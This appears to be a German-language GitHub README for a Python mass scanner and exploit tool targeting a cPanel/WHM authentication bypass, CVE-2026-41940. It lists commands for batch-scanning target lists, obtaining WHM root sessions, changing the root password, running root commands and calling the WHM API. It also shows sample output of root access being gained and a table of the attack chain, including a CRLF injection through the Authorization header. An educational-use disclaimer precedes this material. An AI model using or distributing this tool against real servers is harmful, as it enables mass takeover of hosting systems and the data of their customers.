
cPanel/WHM CVE-2026-41940 - Mass Scanner & Exploiter
cPanel/WHM Authentifizierungs-Bypass-Scanner & Exploit-Tool für CVE-2026-41940
Dieses Tool wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt.
Durch die Nutzung dieses Tools stimmen Sie zu, dass:
❗ Der Autor übernimmt KEINE Verantwortung für Missbrauch, illegale Aktivitäten, Schäden oder rechtliche Konsequenzen, die sich aus der Nutzung dieses Tools ergeben.
CVE-2026-41940 ist eine kritische Schwachstelle zur Authentifizierungsumgehung in cPanel/WHM, die es Angreifern ermöglichen kann, ohne gültige Anmeldedaten unbefugten Root-Zugriff zu erlangen.
Dieses Tool bietet eine Python-basierte Implementierung für:
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| Feld | Wert |
|---|---|
| CVE | CVE-2026-41940 |
| Schweregrad | Kritisch (CVSS 9.8) |
| Angriffsvektor | Netzwerk |
| Erforderliche Berechtigungen |
-hostnameFür sichere und legale Tests:
Wenn Ihnen dieses Projekt geholfen hat, ziehen Sie in Betracht, ihm einen ⭐ zu geben
| Stufe | Beschreibung |
|---|
| 1. Pre-Authentifizierung | Senden ungültiger Anmeldedaten an /login/, um das whostmgrsession-Cookie zu erhalten |
| 2. CRLF-Injection | Einfügen eines Zeilenumbruchs über den Authorization: Basic-Header, um das cpsess-Token preiszugeben |
| 3. Token-Weitergabe | Auslösen von do_token_denied, um das Token in den Cache zu propagieren |
| 4. Verifikation | Zugriff auf /json-api/version, um den WHM-Root-Zugriff zu bestätigen |
| Funktion | Beschreibung |
|---|
| 🔄 Batch-Scanning | Mehrere Ziele gleichzeitig scannen |
| 🎯 Einzelziel | Einzelnes Ziel mit detaillierter Ausgabe scannen |
| 🔌 Port-Scanning | Automatisches Scannen der WHM-Ports (2082, 2083, 2086, 2087) |
| 🔓 Session-URL | Ein-Klick-WHM-Anmelde-URL generieren |
| 💀 RCE | Systembefehle als Root ausführen |
| 🔑 Passwort ändern | WHM-Root-Passwort ändern |
| 📡 WHM-API-Aufrufe | WHM-API-Funktionen aufrufen |
| 🎨 Farbige Ausgabe | Visuelle Ausgabe der Ergebnisse |
| 💾 Ergebnisse exportieren | Verwundbare Ziele in Datei speichern |
| Parameter | Beschreibung | Beispiel |
|---|
| -u | Einzelziel-URL | -u https://target.com:2087 |
| -f | Ziel-Listendatei | -f targets.txt |
| -c | Parallelität (Threads) | -c 20 |
| -o | Ausgabedatei | -o results.txt |
| -hostname | Benutzerdefinierter Host-Header | -hostname cpanel.target.com |
| --scan-ports | Alle WHM-Ports scannen | --scan-ports |
| -session | Anmelde-URL generieren | -session |
| -passwd | Root-Passwort ändern | -passwd "NewPass123" |
| -cmd | Befehl ausführen | -cmd "id" |
| -keep | Temporäres Konto behalten | -keep |
| -api | WHM-API aufrufen | -api listaccts |
| -api-params | API-Parameter | -api-params "user=root,password=123" |
| Keine |
| Benutzerinteraktion | Keine |